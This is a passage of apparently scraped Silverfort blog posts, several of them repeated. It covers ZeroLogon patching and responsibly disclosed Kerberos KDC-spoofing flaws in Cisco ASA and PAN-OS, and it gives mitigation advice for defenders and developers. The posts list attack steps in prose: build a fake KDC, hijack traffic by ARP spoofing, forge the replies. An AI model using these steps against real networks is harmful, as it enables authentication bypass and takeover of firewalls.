now, instead of waiting for February 2021. After you’ve moved the rest of the devices into enforcement mode, you should take care of the non-secure RPC clients. Do not leave them as is! They are vulnerable! If these devices are 3rd party devices, you should contact the vendor and ask for a solution to make them work with Secure RPC. If for some reason you can’t make the client work with Secure RPC, Silverfort can help protect it – see more below. How Can Silverfort Help until all non-secure RPC clients are covered? Silverfort monitors and controls Netlogon traffic in the network. This allows Silverfort to detect all computers using non-secure RPC. For these devices, Silverfort can increase the risk, and provide additional layers of security, like stepping up the authentication requirements to or from these devices. So Summarizing the Recommended Steps: 1. Update your domain controllers 2. Use Silverfort’s open-source tool to see if there are any DCs left unpatched 3. Use Silverfort or Microsoft for auditing for clients using non-secure RPC 4. Put non-Secure RPC clients into the allow-list 5. Move the domain into enforcement mode as soon as possible 6. Start a process to fix non-secure RPC clients or remove them from your network 7. In the meantime, use Silverfort to protect vulnerable clients from exploitation and restrict their usage. Yaron Kassner, CTO and Co Founder, Silverfort Silverfort’s CTO and Co-Founder Yaron Kassner is a cybersecurity and big data technology expert. Before co-founding Silverfort, Yaron served as a big data expert consultant for Cisco. He also developed new capabilities involving big data analytics and machine learning algorithms at Microsoft. Prior to that Yaron served at the 8200 elite cyber unit of the Israel Defense Forces, where he led a reputable R&D team, raised to the rank of Captain, and received a prestigious excellence award. Yaron holds a B. Sc. in Mathematics, Summa Cum Laude, an M. Sc. and Ph. D. in Computer Science from the Technion – Israel Institute of Technology. --- - Published: 2020-09-24 - Modified: 2024-09-09 - URL: https://www.silverfort.com/blog/zerologon-patching-is-not-enough-2/ Guidelines and Tools for Protecting Your Environment from CVE-2020-1472 By Yaron Kassner, CTO and Co Founder, Silverfort Secura recently published a whitepaper about one of the worst vulnerabilities that I’ve seen in a while. It’s called ZeroLogon, a. k. a. CVE-2020-1472. The DHS also published an emergency directive to patch affected Windows Servers. And they’re not exaggerating – the vulnerability lets an attacker create a domain admin account, just by sending unauthenticated packets to a domain controller. This means that anyone in the network can take over the entire domain. For those interested in the technical bits and bytes – I highly recommend reading the whitepaper. The described attack is elegant and takes advantage of an inherent vulnerability in the NRPC protocol. It turns out that some people were so interested in this attack, that they developed a full working exploit and published it on GitHub. So, if you haven’t deployed the update yet, stop reading this article and do it now. Come back after you do. As with most vulnerabilities, Microsoft published an advisory, along with a security update. While some may be tempted to install the update and forget about it, the careful reader will notice this comment: “Microsoft is addressing this vulnerability in a phased rollout. ” Yap – it’s not a good thing. A phased rollout means that during the first phase of the roll out your system is still vulnerable. A phased approach had to be taken in this case because the vulnerability is inherent in the NRPC protocol. The patch prevents the attack by enforcing an additional layer of security on top of the protocol – that is Secure RPC. Unfortunately, it is not enough to update the server side, i. e. the DC – because the clients also need to be updated for the protocol to work. Microsoft took care of Windows devices, but it didn’t provide a solution for legacy operating systems that are no longer supported or third party products. This means that enforcing Secure RPC will break these incompatible systems. During the first phase, AD enforces secure RPC for Windows devices, which means the worst form of the attack can be prevented. But other clients may still be vulnerable. We developed a simple tool that iterates over the domain controllers in your domain and checks whether all of them are patched. The tool is based on the original testing tool published by Secura but instead of running on one DC at a time, it will automatically find the DCs and run on all of them. We recommend that you run this tool to make sure none of the DCs in your environment have been missed – one unpatched DC is enough to compromise the entire domain. Download The Github Testing Tool Here Moving to Phase Two In the second phase, AD enforces secure RPC for all computers, including non-windows devices. The second phase will be done automatically on February 2nd, but you can start it earlier, and we recommend that you do. To do that, you should first make sure that you don’t have any clients in the network that rely on non-secure RPC. Microsoft provides audit logs to discover such clients and Silverfort can help as well: You can leverage Silverfort to prepare a report that lists clients that use non-secure RPC. If you don’t have Silverfort, you can start by auditing Microsoft’s event logs. What to do with non-secure RPC clients? Here is my recommendation. First of all, put them into "Domain controller: Allow vulnerable Netlogon secure channel connections" group policy. This does not secure these clients , but it will allow you to move the rest of the devices into the enforcement mode now, instead of waiting for February 2021. After you’ve moved the rest of the devices into enforcement mode, you should take care of the non-secure RPC clients. Do not leave them as is! They are vulnerable! If these devices are 3rd party devices, you should contact the vendor and ask for a solution to make them work with Secure RPC. If for some reason you can’t make the client work with Secure RPC, Silverfort can help protect it – see more below. How Can Silverfort Help until all non-secure RPC clients are covered? Silverfort monitors and controls Netlogon traffic in the network. This allows Silverfort to detect all computers using non-secure RPC. For these devices, Silverfort can increase the risk, and provide additional layers of security, like stepping up the authentication requirements to or from these devices. So Summarizing the Recommended Steps: 1. Update your domain controllers 2. Use Silverfort’s open-source tool to see if there are any DCs left unpatched 3. Use Silverfort or Microsoft for auditing for clients using non-secure RPC 4. Put non-Secure RPC clients into the allow-list 5. Move the domain into enforcement mode as soon as possible 6. Start a process to fix non-secure RPC clients or remove them from your network 7. In the meantime, use Silverfort to protect vulnerable clients from exploitation and restrict their usage. Yaron Kassner, CTO and Co Founder, Silverfort Silverfort’s CTO and Co-Founder Yaron Kassner is a cybersecurity and big data technology expert. Before co-founding Silverfort, Yaron served as a big data expert consultant for Cisco. He also developed new capabilities involving big data analytics and machine learning algorithms at Microsoft. Prior to that Yaron served at the 8200 elite cyber unit of the Israel Defense Forces, where he led a reputable R&D team, raised to the rank of Captain, and received a prestigious excellence award. Yaron holds a B. Sc. in Mathematics, Summa Cum Laude, an M. Sc. and Ph. D. in Computer Science from the Technion – Israel Institute of Technology. --- - Published: 2020-05-14 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/silverfort-researchers-panw-pan-os-cve-2020-2002/ Palo Alto Networks published an advisory about a KDC-spoofing vulnerability in PAN-OS that was discovered and responsibly disclosed to Palo Alto Networks by Silverfort researchers Yoav Iellin, Yaron Kassner and Rotem Zach. The vulnerability affected all supported versions of PAN-OS, and all interfaces that used a Kerberos authentication profile. After disclosing the vulnerability, Palo Alto Networks fixed all supported versions of PAN-OS and published an advisory about it. The vulnerability can allow an attacker to bypass the Kerberos authentication to PAN-OS and gain access to the administrative interfaces to PAN-OS, as well as authentication to firewall sessions through the captive portal. This vulnerability is similar to a KDC spoofing vulnerability our researchers discovered in Cisco ASA. It seems that the implementation of the Kerberos authentication protocol is not always completed correctly, leaving systems vulnerable to exploits. Palo Alto Networks fixed this vulnerability in all versions of PAN-OS. We highly recommend deploying this patch to protect against an exploit. This article outlines the KDC spoofing vulnerability in PAN-OS and shows how it can be used to bypass the authentication without knowing the password. It explains how to avoid these vulnerabilities as a developer implementing Kerberos as well as enterprises using Kerberos authentication to their systems. Explaining the Vulnerability The vulnerability lies in Palo Alto Networks’s Kerberos implementation. Kerberos is the most common authentication protocol for on-premise authentication. It is widely available in corporate networks due to the popularity of Active Directory, and it is preferred over weaker authentication protocols such as NTLM. Palo Alto Networks uses the Kerberos authentication protocol in many PAN-OS interfaces – for example, SSL VPN, Captive Portal or Administrator login. Therefore, bypassing Kerberos authentication allows an attacker to administer Palo Alto Networks Strata, bypass its security, and gain access to additional networks. For the Kerberos protocol to work, three things should happen: the user authenticates to the server the server authenticates to the client the KDC authenticates to the server Apparently, KDC authentication to the server is often overlooked. Perhaps because requiring it complicates the configuration requirements. However, if the KDC does not authenticate to the server, the security of the protocol is entirely compromised, allowing an attacker that hijacked the network traffic to authenticate to PAN-OS with any password, even a wrong one. Discovering the Vulnerability in PAN-OS We discovered the vulnerability when we tried to add Silverfort’s MFA to interfaces that rely on the Kerberos protocol, including the SSL VPN, Captive Portal and Admin Login. In order to set this up, we configured Kerberos as the authentication method and configured a matching MFA policy on the Silverfort side. A detailed explanation about the Kerberos protocol and KDC spoofing can be found at the end of this article. As seen below, the network capture includes an AS-REQ and an AS-REP but no TGS-REQ: The authentication was successful even though the TGS-REQ is required by the protocol and was missing from the authentication process. Since we already discovered a similar vulnerability with Cisco ASA, we wanted to verify this. We went back and checked the Palo Alto Networks guide for configuring Kerberos authentication – below is a screenshot of the guide at that time: We realized that we were not required to configure a keytab or a service password at any point of the configuration process. PAN-OS provides an option to configure a keytab, but it was optional. However, even if the keytab was configured, we saw that it was not used for the authentication process to the said interfaces. Without a keytab or a password, PAN-OS does not have the credentials required to validate the authenticity of the KDC. This means that PAN-OS is susceptible to KDC spoofing. Attempting to Exploit the Vulnerability Now that we knew that the PAN-OS is vulnerable, we simulated an attack by redirecting the traffic between PAN-OS and the KDC, in this case the domain controller, on port 88 (the Kerberos port), to our own Windows Server. We set up a fake domain on the windows server and made sure there is a user with the same User Principal Name (UPN) as the PAN-OS administrator in the real domain. For this example we will call him 'Bob. ' We configured that user’s password to be “1” in the fake domain. We then tried the following situations: Regular login (Traffic not diverted) – we managed to login with Bob’s original password, as expected. When trying the password “1”, the login failed. Logging in with the traffic diverted to our fake DC – logging in with Bob’s original password failed but logging in with the password “1” worked. Prevention and Mitigation Mitigation Steps for Security Professionals First and foremost, upgrade your PAN-OS to a fixed version and make the required configuration changes detailed in the Palo Alto Networks advisory. Continuously monitor your Kerberos authentication. Look for resources that request only AS_REQ. If there are no TGS_REQs, it’s a red flag. Use Silverfort’s open source tool to search the authentication logs for services that don’t request service tickets. See developer recommendations for any internally developed applications that implement Kerberos and systems you configured by yourself. Silverfort customers are leveraging the step-up authentication capability with Palo Alto Networks should update their Silverfort MFA policy from a TGT policy to a service ticket policy after upgrading their PAN-OS. As a Developer We recommend a few steps to make sure that your solution is not susceptible to KDC spoofing: Validate that the implementation of Kerboros requires a password or keytab: To validate the DC, you need to use some kind of shared secret. If your solution does not enable configuring a keytab file, or a service account password, the application is surely susceptible to KDC spoofing. Run Wireshark – use Wireshark to see what Kerberos requests are sent during authentication. If there is no TGS_REQ, it’s a red flag. If you want to implement an authentication protocol yourself, you must follow the protocol RFCs diligently. We recommend taking the easier route and using an existing implementation of these protocols. Use 3rd party libraries properly – some 3rd party libraries require specific configuration to avoid KDC spoofing. For example, a common library used for Kerberos called pam-krb5, has to have a keytab configured to work properly. Here is the relevant paragraph from their documentation (https://github. com/rra/pam-krb5/blob/master/README. md) Background An overview of the Kerberos Protocol The Kerberos authentication protocol was developed in the 1980s by Steve Miller and Clifford Neuman. It allows Single Sign-On (SSO) in a managed network and its Active Directory (AD) implementation has turned it into the primary authentication protocol for on-premises enterprise environments. The protocol consists of three exchanges to provide mutual authentication for the user and the server accessed. When users log in, they enter their credentials and the Authentication Service (AS) exchange takes place. The user gets a Ticket Granting Ticket (TGT), which is later used to obtain tickets to specific services during the Ticket Granting Service (TGS) Exchange. The ticket is then used during the Client/Server Exchange to complete the authentication: 1. Authentication Service (AS) Exchange During the AS exchange the user authenticates with the Key Distribution Center (KDC). In return, the user obtains the ticket and key required to authenticate with services in the network without re-entering the credentials. When the user first enters the credentials, the client sends an AS_REQ to the Authentication Service (AS) function of the KDC. The AS_REQ is a message signed by the Master Key, which is a function of the user’s password. The Authentication Service, which is part of the KDC, verifies the AS_REQ according the master key, which is also available to the KDC. After validation the AS_REQ, the KDC returns an AS_REP, which contains a logon session key and a Ticket-Granting Ticket (TGT), that is encrypted with the KDC’s key. The AS Exchange is outlined below. The TGT will be used by the TGS exchange to obtain access to specific services. 2. Ticket-Granting Service (TGS) Exchange When the user attempts to access a service in the network, the user sends a TGS_REQ to the Ticket Granting Server (TGS) function of the KDC. This message is encrypted with the logon session key, which is obtained during the AS Exchange. The TGS_REQ is verified by the TGS, which then returns a TGS_REP. The TGS_REP contains a service session key and a service ticket, which is encrypted with the master key of the server that hosts the service. The master key of the server in a Unix-based system is configured in a file called a keytab file. The master key of the server in a member server is derived from the computer account’s password. The TGS Exchange is outlined below. 3. Client/Server Exchange Now the client has everything it needs to authenticate to the service. The client sends an AP_REQ to the service, which is encrypted with the service session key. The service decrypts the service session key to validate the AP_REQ. Then the server returns an AP_REP message and the authentication is complete. The client-server exchange is outlined below: Spoof-Proof Protocol When the Kerberos protocol is implemented correctly, an attacker attempting to impersonate the KDC cannot bypass the authentication. That is because even if an attacker successfully creates a valid AS_REP in response to a hijacked AS_REQ, the attacker will never be able to engineer a valid service ticket. Since the service ticket is encrypted with the server key, a key that the attacker does not have, that would be impossible. What is KDC Spoofing? In 2000, Dug Song, who later co-founded Duo security, reported a technique used to bypass the Kerberos protocol in some situations: He discovered that certain implementations and configurations of Kerberos clients fail to execute the Client/Server exchange, and allow the authentication based on the success of the previous exchanges. Unfortunately, this behavior is not secure, and can be exploited by an attacker. An attacker that is able to hijack the communication between the client and the DC, can take the following steps: Create a fake KDC. Obtain a username authorized to access the service you want to attack. Create a user in the fake KDC with a password of the attacker’s choice. For the demonstration, let’s call this password ”1”. Authenticate to the service with the obtained username and the password ”1”. Hijack the communication from the client to the DC and divert it to the fake KDC. During the AS Exchange, return an AS_REP that corresponds to the password ”1”, the fake KDC key, and a fake logon session key. During the TGS Exchange, return any TGS_REP. The client will accept the authentication without performing an application exchange. The KDC spoofing attacks assume the attacker is able to hijack traffic to and from at the KDC and answer on the KDC’s behalf. This can be done using a variety of techniques. For example, if the attacker is within the same physical network segment as the client, it can perform an ARP spoofing attack as outlined in Network Security Hacks Lockhart 2007. Another possible approach is to take over a networking device such as a switch or router and control the communication from there. --- - Published: 2020-05-14 - Modified: 2024-09-09 - URL: https://www.silverfort.com/blog/cisco-vulnerability-cve-2020-3125-2/ Security researchers at Silverfort, provider of agentless authentication platform, identified a severe vulnerability that can enable hackers to gain control over Cisco Adaptive Security Appliance (ASA). All ASA versions are affected. After disclosing the vulnerability to Cisco, Cisco fixed all supported versions of ASA and published an advisory on it. The vulnerability (CVE-2020-3125) was assigned a CVSS risk score of 8. 1 out of 10, which is considered “High. ” This is because the vulnerability can allow an attacker to bypass the Kerberos authentication to Cisco ASA. Silverfort researchers credited for discovering the vulnerability are: Yoav Iellin, Yaron Kassner, Dor Segal & Rotem Zach. Cisco fixed this vulnerability in all versions of ASA. We highly recommend enterprises upgrade to the latest ASA versions to protect against an exploit. This article outlines the KDC spoofing vulnerability and shows how it can be used to bypass authentication to Cisco ASA. It will explain how to avoid these vulnerabilities as a developer implementing Kerberos as well as enterprises that have already implemented these solutions in their networks. Explaining the Vulnerability The vulnerability lies in Cisco’s Kerberos implementation. Kerberos is the most common authentication protocol for on-premise authentication. It is widely available in corporate networks due to the popularity of Active Directory, and it is preferred over weaker authentication protocols such as NTLM. Cisco uses the Kerberos authentication protocol in many ASA interfaces – for example, VPN, opening firewall sessions, and administrative access, either through the web management console or through SSH. Therefore, bypassing Kerberos authentication allows an attacker to take over the Cisco appliance, bypass its security, and gain access to other networks. For the Kerberos protocol to work, three things should happen: the user authenticates to the server the server authenticates to the client the KDC authenticates to the server Apparently, KDC authentication to the server is often overlooked. Perhaps because requiring it complicates the configuration requirements. However, if the KDC does not authenticate to the server, the security of the protocol is entirely compromised, allowing an attacker that hijacked the network traffic to authenticate to Cisco ASA with any password, even a wrong one. Background An overview of the Kerberos Protocol The Kerberos authentication protocol was developed in the 1980s by Steve Miller and Clifford Neuman. It allows Single Sign-On (SSO) in a managed network and its Active Directory (AD) implementation has turned it into the primary authentication protocol for on-premises enterprise environments. The protocol consists of three exchanges to provide mutual authentication for the user and the server accessed. When users log in, they enter their credentials and the Authentication Service (AS) exchange takes place. The user gets a Ticket Granting Ticket (TGT), which is later used to obtain tickets to specific services during the Ticket Granting Service (TGS) Exchange. The ticket is then used during the Client/Server Exchange to complete the authentication: 1. Authentication Service (AS) Exchange During the AS exchange the user authenticates with the Key Distribution Center (KDC). In return, the user obtains the ticket and key required to authenticate with services in the network without re-entering the credentials. When the user first enters the credentials, the client sends an AS_REQ to the Authentication Service (AS) function of the KDC. The AS_REQ is a message signed by the Master Key, which is a function of the user’s password. The Authentication Service, which is part of the KDC, verifies the AS_REQ according the master key, which is also available to the KDC. After validation the AS_REQ, the KDC returns an AS_REP, which contains a logon session key and a Ticket-Granting Ticket (TGT), that is encrypted with the KDC’s key. The AS Exchange is outlined below. The TGT will be used by the TGS exchange to obtain access to specific services. 2. Ticket-Granting Service (TGS) Exchange When the user attempts to access a service in the network, the user sends a TGS_REQ to the Ticket Granting Server (TGS) function of the KDC. This message is encrypted with the logon session key, which is obtained during the AS Exchange. The TGS_REQ is verified by the TGS, which then returns a TGS_REP. The TGS_REP contains a service session key and a service ticket, which is encrypted with the master key of the server that hosts the service. The master key of the server in a Unix-based system is configured in a file called a keytab file. The master key of the server in a member server is derived from the computer account’s password. The TGS Exchange is outlined below. 3. Client/Server Exchange Now the client has everything it needs to authenticate to the service. The client sends an AP_REQ to the service, which is encrypted with the service session key. The service decrypts the service session key to validate the AP_REQ. Then the server returns an AP_REP message and the authentication is complete. The client-server exchange is outlined below: Spoof-Proof Protocol When the Kerberos protocol is implemented correctly, an attacker attempting to impersonate the KDC cannot bypass the authentication. That is because even if an attacker successfully creates a valid AS_REP in response to a hijacked AS_REQ, the attacker will never be able to engineer a valid service ticket. Since the service ticket is encrypted with the server key, a key that the attacker does not have, that would be impossible. What is KDC Spoofing? In 2000, Dug Song reported a vulnerability that affects the Kerberos protocol Song, Dug. 2000. Kerberos KDC Spoofing Vulnerability. 28 August. . He discovered that certain implementations and configurations of Kerberos clients fail to execute the Client/Server exchange, and allow the authentication based on the success of the previous exchanges. Unfortunately, this behavior is not secure, and can be exploited by an attacker. An attacker that is able to hijack the communication between the client and the DC, can take the following steps: Create a fake KDC. Obtain a username authorized to access the service you want to attack. Create a user in the fake KDC with a password of the attacker’s choice. For the demonstration, let’s call this password ”1”. Authenticate to the service with the obtained username and the password ”1”. Hijack the communication from the client to the DC and divert it to the fake KDC. During the AS Exchange, return an AS_REP that corresponds to the password ”1”, the fake KDC key, and a fake logon session key. During the TGS Exchange, return any TGS_REP. The client will accept the authentication without performing an application exchange. The KDC spoofing attacks assume the attacker is able to hijack traffic to and from at the KDC and answer on the KDC’s behalf. This can be done using a variety of techniques. For example, if the attacker is within the same physical network segment as the client, it can perform an ARP spoofing attack as outlined in Network Security Hacks Lockhart 2007. Another possible approach is to take over a networking device such as a switch or router and control the communication from there. How We Discovered the Vulnerability in Cisco ASA We were looking for a way to add Multi Factor Authentication (MFA) to administrators accessing Cisco ASA and Anyconnect VPN. After configuring Cisco to use Kerberos as the authentication protocol, we examined the authentication logs in Silverfort’s console. Silverfort provides full visibility into all the authentication activities in the network. Silverfort’s logs showed that Cisco ASA was requesting a TGT without requesting a service ticket. We went back to the configuration guide Cisco. 2007. PIX/ASA : Kerberos Authentication and LDAP Authorization Server Groups for VPN Client Users via ASDM/CLI Configuration Example. 30 July. ; and looked at the parameters required to configure Kerberos authentication: As seen above, there is no place to enter the password or keytab configuration for Kerberos authentication. The password or keytab are required for a correct implementation since they create the ‘secret’ used by Kerberos to authenticate in a trusted way to the KDC. Without the ‘secret’, authentication cannot be cryptographically trusted. We went ahead and tried the same for other Cisco interfaces and saw the same vulnerability exists when opening firewall sessions, administrative authentication and even when using SSH to access the VM. See below the Kerberos column in the table summarizing Cisco support for different authentication protocols. Exploitation Next, we wanted to see is this vulnerability can be exploited. For that, we hijacked the Kerberos traffic intended for the DC and diverted it to our server. Instead of developing our own KDC logic, we simply installed AD Domain Services on our rogue server, promoting our server to be a domain controller. Of course, not being an admin in the original domain, we created a new fake domain. Since we know the username for the Cisco administrator in the first domain (Bob in this example), we created a user named Bob in our fake domain. We configured that user’s password in our fake domain to be “1”. We then tried the following situations: Regular login (Traffic not diverted) – we managed to login with Bob’s original password, as expected. When trying the password “1”, the login failed. Logging in with the traffic diverted to our fake DC – logging in with Bob’s original password failed but logging in with the password “1” worked. Prevention and Mitigation Mitigation Steps for Security Professionals First of all, upgrade your Cisco ASA to a fixed version and make the required configuration changes detailed in the Cisco advisory Continuously monitor your Kerberos authentication. Look for resources that request only AS_REQ. If there are no TGS_REQs, it’s a red flag. Use Silverfort’s Silverfort’s open source tool to search the authentication logs for services that don’t request service tickets. See developer recommendations for any internally developed applications that implement Kerberos and systems you configured by yourself. Silverfort customers are leveraging the step-up authentication capability with Palo Alto Networks should update their Silverfort MFA policy from a TGT policy to a service ticket policy after upgrading their PAN-OS. As a Developer We recommend a few steps to make sure that your solution is not susceptible to KDC spoofing: Validate that the implementation of Kerberos requires a password or keytab: To validate the DC, you need to use some kind of shared secret. If your solution does not enable configuring a keytab file, or a service account password, the application is surely susceptible to KDC spoofing. Run Wireshark – use Wireshark to see what Kerberos requests are sent during authentication. If there is no TGS_REQ, it’s a red flag. If you want to implement an authentication protocol yourself, you must follow the protocol RFCs diligently. We recommend taking the easier route and using an existing implementation of these protocols. Use 3rd party libraries properly – some 3rd party libraries require specific configuration to avoid KDC spoofing. For example, a common library used for Kerberos called pam-krb5, has to have a keytab configured to work properly. Here is the relevant paragraph from their documentation (https://github. com/rra/pam-krb5/blob/master/README. md) --- - Published: 2020-05-14 - Modified: 2024-09-09 - URL: https://www.silverfort.com/blog/silverfort-researchers-panw-pan-os-cve-2020-2002-2/ Palo Alto Networks published an advisory about a KDC-spoofing vulnerability in PAN-OS that was discovered and responsibly disclosed to Palo Alto Networks by Silverfort researchers Yoav Iellin, Yaron Kassner and Rotem Zach. The vulnerability affected all supported versions of PAN-OS, and all interfaces that used a Kerberos authentication profile. After disclosing the vulnerability, Palo Alto Networks fixed all supported versions of PAN-OS and published an advisory about it. The vulnerability can allow an attacker to bypass the Kerberos authentication to PAN-OS and gain access to the administrative interfaces to PAN-OS, as well as authentication to firewall sessions through the captive portal. This vulnerability is similar to a KDC spoofing vulnerability our researchers discovered in Cisco ASA. It seems that the implementation of the Kerberos authentication protocol is not always completed correctly, leaving systems vulnerable to exploits. Palo Alto Networks fixed this vulnerability in all versions of PAN-OS. We highly recommend deploying this patch to protect against an exploit. This article outlines the KDC spoofing vulnerability in PAN-OS and shows how it can be used to bypass the authentication without knowing the password. It explains how to avoid these vulnerabilities as a developer implementing Kerberos as well as enterprises using Kerberos authentication to their systems. Explaining the Vulnerability The vulnerability lies in Palo Alto Networks’s Kerberos implementation. Kerberos is the most common authentication protocol for on-premise authentication. It is widely available in corporate networks due to the popularity of Active Directory, and it is preferred over weaker authentication protocols such as NTLM. Palo Alto Networks uses the Kerberos authentication protocol in many PAN-OS interfaces – for example, SSL VPN, Captive Portal or Administrator login. Therefore, bypassing Kerberos authentication allows an attacker to administer Palo Alto Networks Strata, bypass its security, and gain access to additional networks. For the Kerberos protocol to work, three things should happen: the user authenticates to the server the server authenticates to the client the KDC authenticates to the server Apparently, KDC authentication to the server is often overlooked. Perhaps because requiring it complicates the configuration requirements. However, if the KDC does not authenticate to the server, the security of the protocol is entirely compromised, allowing an attacker that hijacked the network traffic to authenticate to PAN-OS with any password, even a wrong one. Discovering the Vulnerability in PAN-OS We discovered the vulnerability when we tried to add Silverfort’s MFA to interfaces that rely on the Kerberos protocol, including the SSL VPN, Captive Portal and Admin Login. In order to set this up, we configured Kerberos as the authentication method and configured a matching MFA policy on the Silverfort side. A detailed explanation about the Kerberos protocol and KDC spoofing can be found at the end of this article. As seen below, the network capture includes an AS-REQ and an AS-REP but no TGS-REQ: The authentication was successful even though the TGS-REQ is required by the protocol and was missing from the authentication process. Since we already discovered a similar vulnerability with Cisco ASA, we wanted to verify this. We went back and checked the Palo Alto Networks guide for configuring Kerberos authentication – below is a screenshot of the guide at that time: We realized that we were not required to configure a keytab or a service password at any point of the configuration process. PAN-OS provides an option to configure a keytab, but it was optional. However, even if the keytab was configured, we saw that it was not used for the authentication process to the said interfaces. Without a keytab or a password, PAN-OS does not have the credentials required to validate the authenticity of the KDC. This means that PAN-OS is susceptible to KDC spoofing. Attempting to Exploit the Vulnerability Now that we knew that the PAN-OS is vulnerable, we simulated an attack by redirecting the traffic between PAN-OS and the KDC, in this case the domain controller, on port 88 (the Kerberos port), to our own Windows Server. We set up a fake domain on the windows server and made sure there is a user with the same User Principal Name (UPN) as the PAN-OS administrator in the real domain. For this example we will call him 'Bob. ' We configured that user’s password to be “1” in the fake domain. We then tried the following situations: Regular login (Traffic not diverted) – we managed to login with Bob’s original password, as expected. When trying the password “1”, the login failed. Logging in with the traffic diverted to our fake DC – logging in with Bob’s original password failed but logging in with the password “1” worked. Prevention and Mitigation Mitigation Steps for Security Professionals First and foremost, upgrade your PAN-OS to a fixed version and make the required configuration changes detailed in the Palo Alto Networks advisory. Continuously monitor your Kerberos authentication. Look for resources that request only AS_REQ. If there are no TGS_REQs, it’s a red flag. Use Silverfort’s open source tool to search the authentication logs for services that don’t request service tickets. See developer recommendations for any internally developed applications that implement Kerberos and systems you configured by yourself. Silverfort customers are leveraging the step-up authentication capability with Palo Alto Networks should update their Silverfort MFA policy from a TGT policy to a service ticket policy after upgrading their PAN-OS. As a Developer We recommend a few steps to make sure that your solution is not susceptible to KDC spoofing: Validate that the implementation of Kerboros requires a password or keytab: To validate the DC, you need to use some kind of shared secret. If your solution does not enable configuring a keytab file, or a service account password, the application is surely susceptible to KDC spoofing. Run Wireshark – use Wireshark to see what Kerberos requests are sent during authentication. If there is no TGS_REQ, it’s a red flag. If you want to implement an authentication protocol yourself, you must follow the protocol RFCs diligently. We recommend taking the easier route and using an existing implementation of these protocols. Use 3rd party libraries properly – some 3rd party libraries require specific configuration to avoid KDC spoofing. For example, a common library used for Kerberos called pam-krb5, has to have a keytab configured to work properly. Here is the relevant paragraph from their documentation (https://github. com/rra/pam-krb5/blob/master/README. md) Background An overview of the Kerberos Protocol The Kerberos authentication protocol was developed in the 1980s by Steve Miller and Clifford Neuman. It allows Single Sign-On (SSO) in a managed network and its Active Directory (AD) implementation has turned it into the primary authentication protocol for on-premises enterprise environments. The protocol consists of three exchanges to provide mutual authentication for the user and the server accessed. When users log in, they enter their credentials and the Authentication Service (AS) exchange takes place. The user gets a Ticket Granting Ticket (TGT), which is later used to obtain tickets to specific services during the Ticket Granting Service (TGS) Exchange. The ticket is then used during the Client/Server Exchange to complete the authentication: 1. Authentication Service (AS) Exchange During the AS exchange the user authenticates with the Key Distribution Center (KDC). In return, the user obtains the ticket and key required to authenticate with services in the network without re-entering the credentials. When the user first enters the credentials, the client sends an AS_REQ to the Authentication Service (AS) function of the KDC. The AS_REQ is a message signed by the Master Key, which is a function of the user’s password. The Authentication Service, which is part of the KDC, verifies the AS_REQ according the master key, which is also available to the KDC. After validation the AS_REQ, the KDC returns an AS_REP, which contains a logon session key and a Ticket-Granting Ticket (TGT), that is encrypted with the KDC’s key. The AS Exchange is outlined below. The TGT will be used by the TGS exchange to obtain access to specific services. 2. Ticket-Granting Service (TGS) Exchange When the user attempts to access a service in the network, the user sends a TGS_REQ to the Ticket Granting Server (TGS) function of the KDC. This message is encrypted with the logon session key, which is obtained during the AS Exchange. The TGS_REQ is verified by the TGS, which then returns a TGS_REP. The TGS_REP contains a service session key and a service ticket, which is encrypted with the master key of the server that hosts the service. The master key of the server in a Unix-based system is configured in a file called a keytab file. The master key of the server in a member server is derived from the computer account’s password. The TGS Exchange is outlined below. 3. Client/Server Exchange Now the client has everything it needs to authenticate to the service. The client sends an AP_REQ to the service, which is encrypted with the service session key. The service decrypts the service session key to validate the AP_REQ. Then the server returns an AP_REP message and the authentication is complete. The client-server exchange is outlined below: Spoof-Proof Protocol When the Kerberos protocol is implemented correctly, an attacker attempting to impersonate the KDC cannot bypass the authentication. That is because even if an attacker successfully creates a valid AS_REP in response to a hijacked AS_REQ, the attacker will never be able to engineer a valid service ticket. Since the service ticket is encrypted with the server key, a key that the attacker does not have, that would be impossible. What is KDC Spoofing? In 2000, Dug Song, who later co-founded Duo security, reported a technique used to bypass the Kerberos protocol in some situations: He discovered that certain implementations and configurations of Kerberos clients fail to execute the Client/Server exchange, and allow the authentication based on the success of the previous exchanges. Unfortunately, this behavior is not secure, and can be exploited by an attacker. An attacker that is able to hijack the communication between the client and the DC, can take the following steps: Create a fake KDC. Obtain a username authorized to access the service you want to attack. Create a user in the fake KDC with a password of the attacker’s choice. For the demonstration, let’s call this password ”1”. Authenticate to the service with the obtained username and the password ”1”. Hijack the communication from the client to the DC and divert it to the fake KDC. During the AS Exchange, return an AS_REP that corresponds to the password ”1”, the fake KDC key, and a fake logon session key. During the TGS Exchange, return any TGS_REP. The client will accept the authentication without performing an application exchange. The KDC spoofing attacks assume the attacker is able to hijack traffic to and from at the KDC and answer on the KDC’s behalf. This can be done using a variety of techniques. For example, if the attacker is within the same physical network segment as the client, it can perform an ARP spoofing attack as outlined in Network Security Hacks Lockhart 2007. Another possible approach is to take over a networking device such as a switch or router and control the communication from there. --- - Published: 2020-05-06 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/cisco-vulnerability-cve-2020-3125/ Security researchers at Silverfort, provider of agentless authentication platform, identified a severe vulnerability that can enable hackers to gain control over Cisco Adaptive Security Appliance (ASA). All ASA versions are affected. After disclosing the vulnerability to Cisco, Cisco fixed all supported versions of ASA and published an advisory on it. The vulnerability (CVE-2020-3125) was assigned a CVSS risk score of 8. 1 out of 10, which is considered “High. ” This is because the vulnerability can allow an attacker to bypass the Kerberos authentication to Cisco ASA. Silverfort researchers credited for discovering the vulnerability are: Yoav Iellin, Yaron Kassner, Dor Segal & Rotem Zach. Cisco fixed this vulnerability in all versions of ASA. We highly recommend enterprises upgrade to the latest ASA versions to protect against an exploit. This article outlines the KDC spoofing vulnerability and shows how it can be used to bypass authentication to Cisco ASA. It will explain how to avoid these vulnerabilities as a developer implementing Kerberos as well as enterprises that have already implemented these solutions in their networks. Explaining the Vulnerability The vulnerability lies in Cisco’s Kerberos implementation. Kerberos is the most common authentication protocol for on-premise authentication. It is widely available in corporate networks due to the popularity of Active Directory, and it is preferred over weaker authentication protocols such as NTLM. Cisco uses the Kerberos authentication protocol in many ASA interfaces – for example, VPN, opening firewall sessions, and administrative access, either through the web management console or through SSH. Therefore, bypassing Kerberos authentication allows an attacker to take over the Cisco appliance, bypass its security, and gain access to other networks. For the Kerberos protocol to work, three things should happen: the user authenticates to the server the server authenticates to the client the KDC authenticates to the server Apparently, KDC authentication to the server is often overlooked. Perhaps because requiring it complicates the configuration requirements. However, if the 